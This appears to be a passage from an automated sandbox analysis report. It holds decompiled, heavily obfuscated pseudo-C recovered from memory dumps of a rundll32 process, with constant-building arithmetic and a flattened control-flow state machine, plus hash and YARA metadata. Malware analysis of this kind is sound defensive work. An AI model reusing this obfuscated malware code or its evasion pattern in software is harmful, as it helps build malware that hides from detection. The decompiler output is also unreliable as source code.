                                                                      				_v1644 = _v1644 + 0xb62b;
                                                                      				_v1644 = _v1644 ^ 0x0000c171;
                                                                      				_v1568 = 0x7a35;
                                                                      				_t565 = 0x22;
                                                                      				_v1568 = _v1568 / _t565;
                                                                      				_v1568 = _v1568 ^ 0x0000594d;
                                                                      				_v1580 = 0xc1bd;
                                                                      				_v1580 = _v1580 ^ 0x3e17a97f;
                                                                      				_v1580 = _v1580 ^ 0x3e17610b;
                                                                      				_v1632 = 0xfbf3;
                                                                      				_v1632 = _v1632 | 0xe3b32269;
                                                                      				_t566 = 0x7b;
                                                                      				_v1576 = 0;
                                                                      				_v1632 = _v1632 / _t566;
                                                                      				_v1632 = _v1632 ^ 0x01d9a38a;
                                                                      				_v1684 = 0x7f0a;
                                                                      				_v1684 = _v1684 + 0xffffba22;
                                                                      				_v1684 = _v1684 + 0xffff4029;
                                                                      				_v1684 = _v1684 ^ 0xffff116a;
                                                                      				_v1640 = 0xf5e9;
                                                                      				_v1640 = _v1640 << 4;
                                                                      				_v1640 = _v1640 * 0x56;
                                                                      				_v1640 = _v1640 ^ 0x0529e0ca;
                                                                      				_v1596 = 0xa3c2;
                                                                      				_v1596 = _v1596 >> 0xd;
                                                                      				_v1596 = _v1596 ^ 0x00002478;
                                                                      				_v1744 = 0x3ce7;
                                                                      				_v1744 = _v1744 + 0x1ec4;
                                                                      				_v1744 = _v1744 * 0x61;
                                                                      				_v1744 = _v1744 + 0xffff2004;
                                                                      				_v1744 = _v1744 ^ 0x0021cb7d;
                                                                      				_v1720 = 0xc06f;
                                                                      				_v1720 = _v1720 + 0x6113;
                                                                      				_v1720 = _v1720 ^ 0x8c8fec38;
                                                                      				_v1720 = _v1720 << 3;
                                                                      				_v1720 = _v1720 ^ 0x64761ae1;
                                                                      				_v1668 = 0xe25c;
                                                                      				_v1668 = _v1668 + 0xf44b;
                                                                      				_v1668 = _v1668 ^ 0x0001ff79;
                                                                      				_v1572 = 0x6c73;
                                                                      				_v1572 = _v1572 >> 3;
                                                                      				_v1572 = _v1572 ^ 0x0000406f;
                                                                      				_v1624 = 0xe234;
                                                                      				_v1624 = _v1624 << 9;
                                                                      				_v1624 = _v1624 + 0xf304;
                                                                      				_v1624 = _v1624 ^ 0x01c53e34;
                                                                      				_v1752 = 0xc25c;
                                                                      				_v1752 = _v1752 | 0xfe5ffd9f;
                                                                      				_t567 = 0x7f;
                                                                      				_v1752 = _v1752 * 0x29;
                                                                      				_v1752 = _v1752 ^ 0xbd5fcd1e;
                                                                      				_v1676 = 0xdc66;
                                                                      				_v1676 = _v1676 + 0x58ec;
                                                                      				_v1676 = _v1676 ^ 0x9e034c07;
                                                                      				_v1676 = _v1676 ^ 0x9e020e3e;
                                                                      				_v1660 = 0x40b;
                                                                      				_v1660 = _v1660 << 0x10;
                                                                      				_v1660 = _v1660 >> 7;
                                                                      				_v1660 = _v1660 ^ 0x00083651;
                                                                      				_v1588 = 0x6188;
                                                                      				_v1588 = _v1588 << 7;
                                                                      				_v1588 = _v1588 ^ 0x0030a7cc;
                                                                      				_v1616 = 0x5d0d;
                                                                      				_v1616 = _v1616 ^ 0x7298dccb;
                                                                      				_v1616 = _v1616 | 0xce495452;
                                                                      				_v1616 = _v1616 ^ 0xfed98e9f;
                                                                      				_v1700 = 0x2fb8;
                                                                      				_v1700 = _v1700 * 0x1d;
                                                                      				_v1700 = _v1700 ^ 0x8a1dc7d3;
                                                                      				_v1700 = _v1700 ^ 0x8a18cc28;
                                                                      				_v1656 = 0xf6db;
                                                                      				_v1656 = _v1656 + 0xffffc3cc;
                                                                      				_v1656 = _v1656 / _t567;
                                                                      				_v1656 = _v1656 ^ 0x00005990;
                                                                      				_v1716 = 0xb5ba;
                                                                      				_v1716 = _v1716 + 0xffff7029;
                                                                      				_v1716 = _v1716 + 0x41fd;
                                                                      				_v1716 = _v1716 ^ 0x186cdad6;
                                                                      				_v1716 = _v1716 ^ 0x186c8663;
                                                                      				_v1724 = 0x558c;
                                                                      				_v1724 = _v1724 >> 0xa;
                                                                      				_v1724 = _v1724 + 0x654a;
                                                                      				_v1724 = _v1724 + 0xaeff;
                                                                      				_v1724 = _v1724 ^ 0x00012937;
                                                                      				_v1680 = 0xa928;
                                                                      				_v1680 = _v1680 >> 8;
                                                                      				_v1680 = _v1680 << 7;
                                                                      				_v1680 = _v1680 ^ 0x00005436;
                                                                      				_v1688 = 0xdfdd;
                                                                      				_v1688 = _v1688 + 0x7162;
                                                                      				_v1688 = _v1688 + 0xb335;
                                                                      				_v1688 = _v1688 ^ 0x00024834;
                                                                      				_v1696 = 0xfeae;
                                                                      				_v1696 = _v1696 + 0xffffed12;
                                                                      				_v1696 = _v1696 | 0xbccbbbad;
                                                                      				_v1696 = _v1696 ^ 0xbccb9441;
                                                                      				_v1704 = 0x372d;
                                                                      				_t568 = 0x2a;
                                                                      				_v1704 = _v1704 * 0x33;
                                                                      				_v1704 = _v1704 + 0xffffe1fa;
                                                                      				_v1704 = _v1704 ^ 0x000ae97e;
                                                                      				_v1708 = 0xae48;
                                                                      				_v1708 = _v1708 << 5;
                                                                      				_v1708 = _v1708 ^ 0x6611f6e7;
                                                                      				_v1708 = _v1708 ^ 0x660414fc;
                                                                      				_v1620 = 0x59a4;
                                                                      				_v1620 = _v1620 * 0x66;
                                                                      				_v1620 = _v1620 / _t568;
                                                                      				_v1620 = _v1620 ^ 0x00008226;
                                                                      				_v1756 = 0x5e70;
                                                                      				_t569 = 0x32;
                                                                      				_v1756 = _v1756 / _t569;
                                                                      				_v1756 = _v1756 + 0xc43e;
                                                                      				_v1756 = _v1756 * 0x28;
                                                                      				_v1756 = _v1756 ^ 0x001e8ecc;
                                                                      				_v1636 = 0x58f6;
                                                                      				_v1636 = _v1636 ^ 0xb179a89b;
                                                                      				_v1636 = _v1636 ^ 0x0bd8a84c;
                                                                      				_v1636 = _v1636 ^ 0xbaa15210;
                                                                      				_v1604 = 0x6acc;
                                                                      				_v1604 = _v1604 >> 7;
                                                                      				_v1604 = _v1604 ^ 0x000023d9;
                                                                      				_v1692 = 0xda26;
                                                                      				_v1692 = _v1692 << 0x10;
                                                                      				_v1692 = _v1692 + 0x271;
                                                                      				_v1692 = _v1692 ^ 0xda267b29;
                                                                      				_v1648 = 0x7577;
                                                                      				_v1648 = _v1648 + 0x56f8;
                                                                      				_v1648 = _v1648 * 0x3c;
                                                                      				_v1648 = _v1648 ^ 0x002f8e86;
                                                                      				_v1628 = 0x645b;
                                                                      				_v1628 = _v1628 / _t569;
                                                                      				_v1628 = _v1628 | 0xe392b3cb;
                                                                      				_v1628 = _v1628 ^ 0xe392e996;
                                                                      				_v1564 = 0x67c9;
                                                                      				_v1564 = _v1564 | 0x8303045b;
                                                                      				_v1564 = _v1564 ^ 0x83034b8c;
                                                                      				_v1712 = 0x613;
                                                                      				_t570 = 0x52;
                                                                      				_v1712 = _v1712 * 0x44;
                                                                      				_v1712 = _v1712 >> 0xb;
                                                                      				_v1712 = _v1712 ^ 0x0000010f;
                                                                      				_v1608 = 0xa33e;
                                                                      				_v1608 = _v1608 >> 0xc;
                                                                      				_v1608 = _v1608 * 0x27;
                                                                      				_v1608 = _v1608 ^ 0x000062d8;
                                                                      				_v1664 = 0x32f9;
                                                                      				_v1664 = _v1664 + 0xfffff9a5;
                                                                      				_v1664 = _v1664 * 0x3c;
                                                                      				_v1664 = _v1664 ^ 0x000a1ece;
                                                                      				_v1584 = 0xae89;
                                                                      				_v1584 = _v1584 << 4;
                                                                      				_v1584 = _v1584 ^ 0x000aaa17;
                                                                      				_v1672 = 0xd88b;
                                                                      				_v1672 = _v1672 / _t570;
                                                                      				_t571 = 0x4b;
                                                                      				_v1672 = _v1672 / _t571;
                                                                      				_v1672 = _v1672 ^ 0x00000d29;
                                                                      				_v1592 = 0x757a;
                                                                      				_v1592 = _v1592 >> 4;
                                                                      				_v1592 = _v1592 ^ 0x000029eb;
                                                                      				_v1652 = 0x303b;
                                                                      				_t572 = 0x4e;
                                                                      				_v1652 = _v1652 * 0x72;
                                                                      				_v1652 = _v1652 / _t572;
                                                                      				_v1652 = _v1652 ^ 0x000f4642;
                                                                      				_v1740 = 0x57ea;
                                                                      				_t573 = 0x1f;
                                                                      				_v1740 = _v1740 / _t573;
                                                                      				_t574 = 0xe;
                                                                      				_v1740 = _v1740 / _t574;
                                                                      				_v1740 = _v1740 >> 0xe;
                                                                      				_v1740 = _v1740 ^ 0x00000002;
                                                                      				_v1736 = 0xe268;
                                                                      				_v1736 = _v1736 >> 0xd;
                                                                      				_v1736 = _v1736 | 0xdb2ee2c1;
                                                                      				_t575 = 0x24;
                                                                      				_t582 = _v1576;
                                                                      				_t515 = _v1576;
                                                                      				_v1736 = _v1736 * 0x31;
                                                                      				_v1736 = _v1736 ^ 0xf3f96815;
                                                                      				_v1732 = 0xceb7;
                                                                      				_v1732 = _v1732 * 0x46;
                                                                      				_v1732 = _v1732 + 0xffff8676;
                                                                      				_v1732 = _v1732 + 0xffff6f3a;
                                                                      				_v1732 = _v1732 ^ 0x00377bba;
                                                                      				_v1748 = 0x4370;
                                                                      				_t576 = _v1576;
                                                                      				_v1748 = _v1748 / _t575;
                                                                      				_v1748 = _v1748 + 0xffff72bf;
                                                                      				_v1748 = _v1748 + 0xffff059b;
                                                                      				_v1748 = _v1748 ^ 0xfffe7a29;
                                                                      				while(1) {
                                                                      					L1:
                                                                      					_t554 = 0x5c;
                                                                      					do {
                                                                      						L2:
                                                                      						_t586 = _t516 - 0x23fcadf5;
                                                                      						if(_t586 > 0) {
                                                                      							__eflags = _t516 - 0x2c84300e;
                                                                      							if(_t516 == 0x2c84300e) {
                                                                      								_t578 =  *0x2011088 + 0x38;
                                                                      								while(1) {
                                                                      									__eflags =  *_t578 - _t554;
                                                                      									if( *_t578 == _t554) {
                                                                      										break;
                                                                      									}
                                                                      									_t578 = _t578 + 2;
                                                                      									__eflags = _t578;
                                                                      								}
                                                                      								_t576 = _t578 + 2;
                                                                      								__eflags = _t578 + 2;
                                                                      								_t516 = 0x1b2a5cce;
                                                                      								goto L26;
                                                                      							} else {
                                                                      								__eflags = _t516 - 0x2cef997e;
                                                                      								if(_t516 == 0x2cef997e) {
                                                                      									_t513 = E01FF7626(_v1716, _v1724, _v1680, _t576, _v1688, _v1732, _t516,  &_v520, _v1696, _t516, _v1704, _v1708, _t516, _v1740, _v1620, _t515, _v1748, _t516, _v1756, _v1636, _v1736, _t516, _t576);
                                                                      									_t582 = _t513;
                                                                      									_t583 =  &(_t583[0x15]);
                                                                      									__eflags = _t513;
                                                                      									if(__eflags == 0) {
                                                                      										goto L13;
                                                                      									} else {
                                                                      										_t516 = 0x1b221acf;
                                                                      										_t579 = 1;
                                                                      										_v1576 = 1;
                                                                      										goto L1;
                                                                      									}
                                                                      								} else {
                                                                      									__eflags = _t516 - 0x357f15e1;
                                                                      									if(_t516 != 0x357f15e1) {
                                                                      										goto L26;
                                                                      									} else {
                                                                      										E01FF5AB8(_v1664, _v1584, _v1672, _v1592, _t515);
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							if(_t586 == 0) {
                                                                      								_push(_t516);
                                                                      								E01FF471A(_v1600,  &_v1040, _v1728, _v1612, _v1644, _v1568, _v1580);
                                                                      								_t583 =  &(_t583[8]);
                                                                      								_t516 = 0x16655107;
                                                                      								while(1) {
                                                                      									L1:
                                                                      									_t554 = 0x5c;
                                                                      									goto L2;
                                                                      								}
                                                                      							} else {
                                                                      								if(_t516 == 0x30f776d) {
                                                                      									E01FF5AB8(_v1628, _v1564, _v1712, _v1608, _t582);
                                                                      									_t583 =  &(_t583[3]);
                                                                      									L13:
                                                                      									_t516 = 0x357f15e1;
                                                                      									while(1) {
                                                                      										L1:
                                                                      										_t554 = 0x5c;
                                                                      										goto L2;
                                                                      									}
                                                                      								} else {
                                                                      									if(_t516 == 0x16655107) {
                                                                      										_push(0x1ff1308);
                                                                      										_push(_v1596);
                                                                      										_push(_v1640);
                                                                      										_t499 = E01FF5DFC(_v1632, _v1684, __eflags);
                                                                      										E0200D4E1( &_v1560, __eflags);
                                                                      										E01FF98C5(0x104, __eflags, _v1744, _v1720, _v1668, _v1572, _v1624,  *0x2011088 + 0x254, _v1752, _v1676,  &_v1560,  *0x2011088 + 0x38, _t499,  &_v1040);
                                                                      										E02000D6D(_v1660, _v1588, _v1616, _t499);
                                                                      										_t579 = _v1576;
                                                                      										_t583 =  &(_t583[0x11]);
                                                                      										_t516 = 0x2c84300e;
                                                                      										while(1) {
                                                                      											L1:
                                                                      											_t554 = 0x5c;
                                                                      											goto L2;
                                                                      										}
                                                                      									} else {
                                                                      										if(_t516 == 0x1b221acf) {
                                                                      											E01FFCAA3(_t582, _t515, _v1692, _v1648);
                                                                      											_t583 =  &(_t583[3]);
                                                                      											_t516 = 0x30f776d;
                                                                      											while(1) {
                                                                      												L1:
                                                                      												_t554 = 0x5c;
                                                                      												goto L2;
                                                                      											}
                                                                      										} else {
                                                                      											if(_t516 != 0x1b2a5cce) {
                                                                      												goto L26;
                                                                      											} else {
                                                                      												_t511 = E0200340E(_v1700, _v1656, _t516, _t516, _v1652);
                                                                      												_t515 = _t511;
                                                                      												_t583 =  &(_t583[3]);
                                                                      												if(_t511 != 0) {
                                                                      													_t516 = 0x2cef997e;
                                                                      													while(1) {
                                                                      														L1:
                                                                      														_t554 = 0x5c;
                                                                      														goto L2;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L19:
                                                                      						return _t579;
                                                                      						L26:
                                                                      						__eflags = _t516 - 0x7669d04;
                                                                      					} while (__eflags != 0);
                                                                      					goto L19;
                                                                      				}
                                                                      			}













































































                                                                      0x01ff1e11
                                                                      0x01ff1e19
                                                                      0x01ff1e24
                                                                      0x01ff1e34
                                                                      0x01ff1e3c
                                                                      0x01ff1e41
                                                                      0x01ff1e47
                                                                      0x01ff1e4f
                                                                      0x01ff1e5a
                                                                      0x01ff1e62
                                                                      0x01ff1e6d
                                                                      0x01ff1e7a
                                                                      0x01ff1e7b
                                                                      0x01ff1e85
                                                                      0x01ff1e8b
                                                                      0x01ff1e93
                                                                      0x01ff1ea1
                                                                      0x01ff1ea6
                                                                      0x01ff1eb0
                                                                      0x01ff1eb5
                                                                      0x01ff1ebb
                                                                      0x01ff1ec0
                                                                      0x01ff1ec5
                                                                      0x01ff1ecd
                                                                      0x01ff1ed2
                                                                      0x01ff1edf
                                                                      0x01ff1ee0
                                                                      0x01ff1ee7
                                                                      0x01ff1eee
                                                                      0x01ff1ef2
                                                                      0x01ff1efa
                                                                      0x01ff1f07
                                                                      0x01ff1f0b
                                                                      0x01ff1f13
                                                                      0x01ff1f1b
                                                                      0x01ff1f23
                                                                      0x01ff1f31
                                                                      0x01ff1f38
                                                                      0x01ff1f3c
                                                                      0x01ff1f44
                                                                      0x01ff1f4c
                                                                      0x01ff1f54
                                                                      0x01ff1f54
                                                                      0x01ff1f56
                                                                      0x01ff1f57
                                                                      0x01ff1f57
                                                                      0x01ff1f57
                                                                      0x01ff1f5d
                                                                      0x01ff2105
                                                                      0x01ff210b
                                                                      0x01ff21da
                                                                      0x01ff21e2
                                                                      0x01ff21e2
                                                                      0x01ff21e5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ff21df
                                                                      0x01ff21df
                                                                      0x01ff21df
                                                                      0x01ff21e7
                                                                      0x01ff21e7
                                                                      0x01ff21ea
                                                                      0x00000000
                                                                      0x01ff2111
                                                                      0x01ff2111
                                                                      0x01ff2117
                                                                      0x01ff21ae
                                                                      0x01ff21b3
                                                                      0x01ff21b5
                                                                      0x01ff21b8
                                                                      0x01ff21ba
                                                                      0x00000000
                                                                      0x01ff21c0
                                                                      0x01ff21c2
                                                                      0x01ff21c7
                                                                      0x01ff21c8
                                                                      0x00000000
                                                                      0x01ff21c8
                                                                      0x01ff2119
                                                                      0x01ff2119
                                                                      0x01ff211f
                                                                      0x00000000
                                                                      0x01ff2125
                                                                      0x01ff213c
                                                                      0x01ff2141
                                                                      0x01ff211f
                                                                      0x01ff2117
                                                                      0x01ff1f63
                                                                      0x01ff1f63
                                                                      0x01ff20c3
                                                                      0x01ff20f3
                                                                      0x01ff20f8
                                                                      0x01ff20fb
                                                                      0x01ff1f54
                                                                      0x01ff1f54
                                                                      0x01ff1f56
                                                                      0x00000000
                                                                      0x01ff1f56
                                                                      0x01ff1f69
                                                                      0x01ff1f6f
                                                                      0x01ff20b1
                                                                      0x01ff20b6
                                                                      0x01ff20b9
                                                                      0x01ff20b9
                                                                      0x01ff1f54
                                                                      0x01ff1f54
                                                                      0x01ff1f56
                                                                      0x00000000
                                                                      0x01ff1f56
                                                                      0x01ff1f75
                                                                      0x01ff1f7b
                                                                      0x01ff1fdc
                                                                      0x01ff1fe1
                                                                      0x01ff1fe8
                                                                      0x01ff1ffa
                                                                      0x01ff2008
                                                                      0x01ff2063
                                                                      0x01ff207e
                                                                      0x01ff2083
                                                                      0x01ff208a
                                                                      0x01ff208d
                                                                      0x01ff1f54
                                                                      0x01ff1f54
                                                                      0x01ff1f56
                                                                      0x00000000
                                                                      0x01ff1f56
                                                                      0x01ff1f7d
                                                                      0x01ff1f83
                                                                      0x01ff1fca
                                                                      0x01ff1fcf
                                                                      0x01ff1fd2
                                                                      0x01ff1f54
                                                                      0x01ff1f54
                                                                      0x01ff1f56
                                                                      0x00000000
                                                                      0x01ff1f56
                                                                      0x01ff1f85
                                                                      0x01ff1f8b
                                                                      0x00000000
                                                                      0x01ff1f91
                                                                      0x01ff1f9f
                                                                      0x01ff1fa4
                                                                      0x01ff1fa6
                                                                      0x01ff1fab
                                                                      0x01ff1fb1
                                                                      0x01ff1f54
                                                                      0x01ff1f54
                                                                      0x01ff1f56
                                                                      0x00000000
                                                                      0x01ff1f56
                                                                      0x01ff1f54
                                                                      0x01ff1fab
                                                                      0x01ff1f8b
                                                                      0x01ff1f83
                                                                      0x01ff1f7b
                                                                      0x01ff1f6f
                                                                      0x01ff1f63
                                                                      0x01ff2145
                                                                      0x01ff2150
                                                                      0x01ff21ef
                                                                      0x01ff21ef
                                                                      0x01ff21ef
                                                                      0x00000000
                                                                      0x01ff21fb

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ]$!S$)$-7$6T$;0$Je$MY$[d$bq$h$o@$pC$p^$wu$x$$~$)$<$W$X$h
                                                                      • API String ID: 0-3042135141
                                                                      • Opcode ID: 1537e79e9bb0288ade96649ea91d86cbce78a35e5f51e397960eb16b3fc67b77
                                                                      • Instruction ID: 7bfad7e95f063857e0f6dac0cfdb8b2fced441c3217edbbd3db3ae7a685fb7d4
                                                                      • Opcode Fuzzy Hash: 1537e79e9bb0288ade96649ea91d86cbce78a35e5f51e397960eb16b3fc67b77
                                                                      • Instruction Fuzzy Hash: E2322271509381DBE378CF65C989A8BFBE2BFD0744F10891DE299862A0D7B58949CF03
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ]$!S$)$-7$6T$;0$Je$MY$[d$bq$h$o@$pC$p^$wu$x$$~$)$<$W$X$h
                                                                      • API String ID: 0-3042135141
                                                                      • Opcode ID: 1e04be0b1c495f3d7d80ea5ff648ac88bb8ad58f01bf2bbf98f0a022a624afde
                                                                      • Instruction ID: fd7de6a3c50d466c89a3c70749106786e1c8eb0a5a7a395aea5036936c84f6d6
                                                                      • Opcode Fuzzy Hash: 1e04be0b1c495f3d7d80ea5ff648ac88bb8ad58f01bf2bbf98f0a022a624afde
                                                                      • Instruction Fuzzy Hash: 273224B15093819BE374CF65C98AA9FFBE1BBC0344F10891DE2D9862A0D7B58959CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E01FFADAF(intOrPtr __ecx, signed int __edx) {
                                                                      				char _v524;
                                                                      				char _v1044;
                                                                      				char _v1564;
                                                                      				signed int _v1568;
                                                                      				intOrPtr _v1572;
                                                                      				intOrPtr _v1576;
                                                                      				intOrPtr _v1580;
                                                                      				intOrPtr _v1584;
                                                                      				char _v1588;
                                                                      				intOrPtr _v1592;
                                                                      				char _v1596;
                                                                      				intOrPtr _v1600;
                                                                      				signed int _v1604;
                                                                      				signed int _v1608;
                                                                      				signed int _v1612;
                                                                      				signed int _v1616;
                                                                      				signed int _v1620;
                                                                      				signed int _v1624;
                                                                      				signed int _v1628;
                                                                      				signed int _v1632;
                                                                      				unsigned int _v1636;
                                                                      				signed int _v1640;
                                                                      				signed int _v1644;
                                                                      				signed int _v1648;
                                                                      				signed int _v1652;
                                                                      				signed int _v1656;
                                                                      				signed int _v1660;
                                                                      				signed int _v1664;
                                                                      				signed int _v1668;
                                                                      				signed int _v1672;
                                                                      				signed int _v1676;
                                                                      				signed int _v1680;
                                                                      				signed int _v1684;
                                                                      				signed int _v1688;
                                                                      				signed int _v1692;
                                                                      				signed int _v1696;
                                                                      				signed int _v1700;
                                                                      				signed int _v1704;
                                                                      				signed int _v1708;
                                                                      				signed int _v1712;
                                                                      				signed int _v1716;
                                                                      				signed int _v1720;
                                                                      				signed int _v1724;
                                                                      				signed int _v1728;
                                                                      				signed int _v1732;
                                                                      				signed int _v1736;
                                                                      				unsigned int _v1740;
                                                                      				signed int _v1744;
                                                                      				signed int _v1748;
                                                                      				unsigned int _v1752;
                                                                      				signed int _v1756;
                                                                      				signed int _v1760;
                                                                      				signed int _v1764;
                                                                      				signed int _v1768;
                                                                      				signed int _v1772;
                                                                      				signed int _v1776;
                                                                      				signed int _v1780;
                                                                      				signed int _v1784;
                                                                      				signed int _v1788;
                                                                      				signed int _v1792;
                                                                      				signed int _v1796;
                                                                      				signed int _v1800;
                                                                      				signed int _v1804;
                                                                      				signed int _v1808;
                                                                      				signed int _v1812;
                                                                      				signed int _v1816;
                                                                      				signed int _v1820;
                                                                      				signed int _v1824;
                                                                      				void* _t552;
                                                                      				void* _t553;
                                                                      				signed int _t564;
                                                                      				signed int _t570;
                                                                      				signed int _t579;
                                                                      				signed int _t590;
                                                                      				signed int _t591;
                                                                      				signed int _t592;
                                                                      				signed int _t593;
                                                                      				signed int _t594;
                                                                      				signed int _t595;
                                                                      				signed int _t596;
                                                                      				signed int _t597;
                                                                      				signed int _t598;
                                                                      				char* _t613;
                                                                      				void* _t615;
                                                                      				void* _t647;
                                                                      				signed int _t648;
                                                                      				signed int _t649;
                                                                      				signed int _t651;
                                                                      				void* _t654;
                                                                      				void* _t655;
                                                                      				void* _t658;
                                                                      
                                                                      				_v1604 = __edx;
                                                                      				_v1600 = __ecx;
                                                                      				_v1568 = _v1568 & 0x00000000;
                                                                      				_v1576 = 0x3cc734;
                                                                      				_v1572 = 0x71a41c;
                                                                      				_v1608 = 0x3729;
                                                                      				_v1608 = _v1608 * 0x16;
                                                                      				_t649 = 0x3869a6dc;
                                                                      				_v1608 = _v1608 ^ 0x0004bdaf;
                                                                      				_v1652 = 0x78ac;
                                                                      				_v1652 = _v1652 + 0xffff4506;
                                                                      				_v1652 = _v1652 ^ 0xffff9627;
                                                                      				_v1760 = 0xe2e3;
                                                                      				_v1760 = _v1760 + 0xffff57ea;
                                                                      				_v1760 = _v1760 | 0x0709d11d;
                                                                      				_v1760 = _v1760 + 0xffff5608;
                                                                      				_v1760 = _v1760 ^ 0x07093b35;
                                                                      				_v1824 = 0x209e;
                                                                      				_v1824 = _v1824 | 0x01a4e74d;
                                                                      				_v1824 = _v1824 << 4;
                                                                      				_v1824 = _v1824 + 0xffffc4ad;
                                                                      				_v1824 = _v1824 ^ 0x1a4e3329;
                                                                      				_v1636 = 0xb603;
                                                                      				_v1636 = _v1636 >> 0xb;
                                                                      				_v1636 = _v1636 ^ 0x00006b55;
                                                                      				_v1812 = 0x7008;
                                                                      				_v1812 = _v1812 ^ 0xf49ad265;
                                                                      				_v1812 = _v1812 + 0xffffde22;
                                                                      				_v1812 = _v1812 + 0xd3ad;
                                                                      				_v1812 = _v1812 ^ 0xf49b25a7;
                                                                      				_v1700 = 0x835d;
                                                                      				_v1700 = _v1700 >> 8;
                                                                      				_v1700 = _v1700 + 0xffffa609;
                                                                      				_v1700 = _v1700 ^ 0xffffd2b3;
                                                                      				_v1708 = 0x3ad;
                                                                      				_v1708 = _v1708 << 0xe;
                                                                      				_v1708 = _v1708 ^ 0xb8ddb9ae;
                                                                      				_v1708 = _v1708 ^ 0xb836e296;
                                                                      				_v1820 = 0xf7f7;
                                                                      				_v1820 = _v1820 ^ 0xedcbef50;
                                                                      				_v1820 = _v1820 + 0x117c;
                                                                      				_v1820 = _v1820 ^ 0x1a37088d;
                                                                      				_v1820 = _v1820 ^ 0xf7fc1c6b;
                                                                      				_v1716 = 0x8203;
                                                                      				_t590 = 0x22;
                                                                      				_v1716 = _v1716 * 0x53;
                                                                      				_v1716 = _v1716 | 0xd2646e33;
                                                                      				_v1716 = _v1716 ^ 0xd26e02a9;
                                                                      				_v1804 = 0xde4c;
                                                                      				_v1804 = _v1804 + 0x12e8;
                                                                      				_v1804 = _v1804 + 0x109c;
                                                                      				_v1804 = _v1804 + 0xffffbb9c;
                                                                      				_v1804 = _v1804 ^ 0x0000a7ac;
                                                                      				_v1612 = 0xe5af;
                                                                      				_v1612 = _v1612 + 0xffff12ef;
                                                                      				_v1612 = _v1612 ^ 0xffffa3c5;
                                                                      				_v1788 = 0x767e;
                                                                      				_v1788 = _v1788 / _t590;
                                                                      				_v1788 = _v1788 << 0xb;
                                                                      				_v1788 = _v1788 << 1;
                                                                      				_v1788 = _v1788 ^ 0x0037b1f2;
                                                                      				_v1796 = 0x3cc7;
                                                                      				_v1796 = _v1796 + 0x6544;
                                                                      				_t591 = 6;
                                                                      				_v1796 = _v1796 / _t591;
                                                                      				_v1796 = _v1796 * 0x2f;
                                                                      				_v1796 = _v1796 ^ 0x0004f0b5;
                                                                      				_v1756 = 0x18a9;
                                                                      				_v1756 = _v1756 >> 0xa;
                                                                      				_v1756 = _v1756 ^ 0x485ec199;
                                                                      				_v1756 = _v1756 | 0x10b032a0;
                                                                      				_v1756 = _v1756 ^ 0x58fea489;
                                                                      				_v1764 = 0x3ef7;
                                                                      				_v1764 = _v1764 ^ 0x8490281a;
                                                                      				_v1764 = _v1764 << 7;
                                                                      				_v1764 = _v1764 + 0xffffac29;
                                                                      				_v1764 = _v1764 ^ 0x480b6b9f;
                                                                      				_v1772 = 0xa54f;
                                                                      				_v1772 = _v1772 << 0xe;
                                                                      				_v1772 = _v1772 >> 3;
                                                                      				_v1772 = _v1772 + 0xffff107e;
                                                                      				_v1772 = _v1772 ^ 0x05299e66;
                                                                      				_v1616 = 0xac86;
                                                                      				_v1616 = _v1616 + 0xeb9b;
                                                                      				_v1616 = _v1616 ^ 0x0001fc2d;
                                                                      				_v1780 = 0x1c9e;
                                                                      				_v1780 = _v1780 + 0xffff92f3;
                                                                      				_v1780 = _v1780 << 0xb;
                                                                      				_t592 = 0x32;
                                                                      				_v1780 = _v1780 * 0x61;
                                                                      				_v1780 = _v1780 ^ 0x0c2fed9f;
                                                                      				_v1692 = 0xbfce;
                                                                      				_v1692 = _v1692 * 0x74;
                                                                      				_v1692 = _v1692 * 0x7a;
                                                                      				_v1692 = _v1692 ^ 0x296b682e;
                                                                      				_v1624 = 0x4aa7;
                                                                      				_v1624 = _v1624 + 0xffffd2b2;
                                                                      				_v1624 = _v1624 ^ 0x00003f66;
                                                                      				_v1740 = 0x5f97;
                                                                      				_v1740 = _v1740 << 3;
                                                                      				_v1740 = _v1740 >> 0xb;
                                                                      				_v1740 = _v1740 + 0x8f5f;
                                                                      				_v1740 = _v1740 ^ 0x0000a0d8;
                                                                      				_v1668 = 0xc189;
                                                                      				_v1668 = _v1668 << 5;
                                                                      				_v1668 = _v1668 ^ 0xa10e877e;
                                                                      				_v1668 = _v1668 ^ 0xa116de53;
                                                                      				_v1676 = 0xd3a5;
                                                                      				_v1676 = _v1676 << 4;
                                                                      				_v1676 = _v1676 >> 0xb;
                                                                      				_v1676 = _v1676 ^ 0x00003141;
                                                                      				_v1656 = 0x3e6f;
                                                                      				_v1656 = _v1656 << 7;
                                                                      				_v1656 = _v1656 ^ 0x001f11d2;
                                                                      				_v1688 = 0xc680;
                                                                      				_v1688 = _v1688 >> 3;
                                                                      				_v1688 = _v1688 + 0x3311;
                                                                      				_v1688 = _v1688 ^ 0x000003d8;
                                                                      				_v1808 = 0x746f;
                                                                      				_v1808 = _v1808 * 0x13;
                                                                      				_v1808 = _v1808 ^ 0x7e48992b;
                                                                      				_v1808 = _v1808 ^ 0x60ab5525;
                                                                      				_v1808 = _v1808 ^ 0x1eeb5b5f;
                                                                      				_v1712 = 0x15e7;
                                                                      				_v1712 = _v1712 + 0x6af3;
                                                                      				_v1712 = _v1712 + 0xd59b;
                                                                      				_v1712 = _v1712 ^ 0x000120a5;
